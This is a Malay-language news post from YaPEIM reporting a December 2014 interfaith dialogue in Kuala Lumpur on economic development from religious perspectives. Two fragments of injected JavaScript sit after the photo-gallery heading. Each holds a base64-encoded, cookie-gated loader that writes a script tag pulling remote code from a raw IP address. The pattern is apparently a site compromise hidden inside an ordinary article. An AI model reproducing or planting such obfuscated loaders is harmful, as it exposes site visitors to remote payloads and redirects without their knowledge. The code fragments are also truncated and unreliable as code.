YaPEIM » Program Dialog Silang Agama, Pembangunan Ekonomi Masyarakat Dari Perspektif Agama-Agama

Terkini

Program Dialog Silang Agama, Pembangunan Ekonomi Masyarakat Dari Perspektif Agama-Agama

Program Dialog Silang Agama yang diadakan pada 18 Disember 2014 di Dewan Muktamar Pusat Islam Jawi Kuala Lumpur.

PADA 18 Disember 2014 telah berlangsungnya Program Dialog Silang Agama yang menekankan aspek Pembangunan Ekonomi Masyarakat Dari Perspektif Agama-Agama, program ini telah dijalankan di Dewan Muktamar Pusat Islam Jawi Kuala Lumpur. Untuk pengetahuan umum Program Dialog Silang Agama ini merupakan Program tahunan yang mana ianya menjadi Minister Key Performance Indicator dan telah di amanhkan kepada YaPEIM untuk melaksanakan. Program tersebut telah dihadiri seramai 1,300 orang peserta terdiri dari Badan bukan kerajaan (NGO), Agensi Kerajaan dan Badan Berkanun, TV Al Hijrah, Jabatan Agama Islam Wilayah Persekutuan, Ikim, Pelajar dari USIM, UIA, UiTM, KUIS, ABIM, Persatuan Penduduk dan lain-lain. Panel penceramah adalah dari wakil agama Islam, Buddha dan Kristian dan panel wakil dari agama Hindu tidak dapat menghadirkan diri disaat-saat akhir. Moderator untuk Program Dialog tersebut ialah dari YaPEIM sendiri iaitu Tuan Haji Mohamad Zamri Zakaria dan Panel yang mewakili agama Islam ialah Tuan Haji Jaafar Muhammad, panel agama Buddha En. Thai Ming Yeow manakala panel agama Kristian ialah En. Rev Jonathan A/L Jesudas.

Program dimulai dengan kata-kata aluan dan pengenalan berkenaan Dialog oleh Tuan Moderator. Dialog terbahagi kepada tiga sesi, sesi pertama setiap panel akan merungkaikan dan memberi penerangan berkenaan tajuk yang diberikan iaitu Aspek Pembangunan & Pengukuhan Ekonomi Menurut Pandangan Agama-Agama. Sesi kedua pula sesi soal jawab dimana para peserta akan betanyakan soalan berkenaan tajuk yang dibincangkan kepada para panel. Dan sesi ketiga pula sesi penutup dimana setiap para panel akan membuat pergulungan dan konklusi. Program Dialog ini berlangsung selama 2 jam.

Setelah tamatnya sesi Dialog maka sesi majlis perasmian penutup berlangsung. Sesi perasmian penutup dimulai dengan ucapan dari pengerusi majlis dan didahului dengan bacaan doa. Majlis perasmian penutup dirasmikan oleh Ketua Pengarah YaPEIM iaitu Dato’ Abibullah Haji Samsuddin. Majlis disudahi dengan penyerahan cenderahati kepada para panel dan sesi bergambar. Dengan berakhirnya sesi tersebut maka berakhirlah Program Dialog Silang Agama yang mana ianya akan memberi input dan maklumat kepada masyarakat yang berbilang agama agar ia mampu untuk memberi kefahaman dan hormat menghormati sesama agama.

Galeri Gambar

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top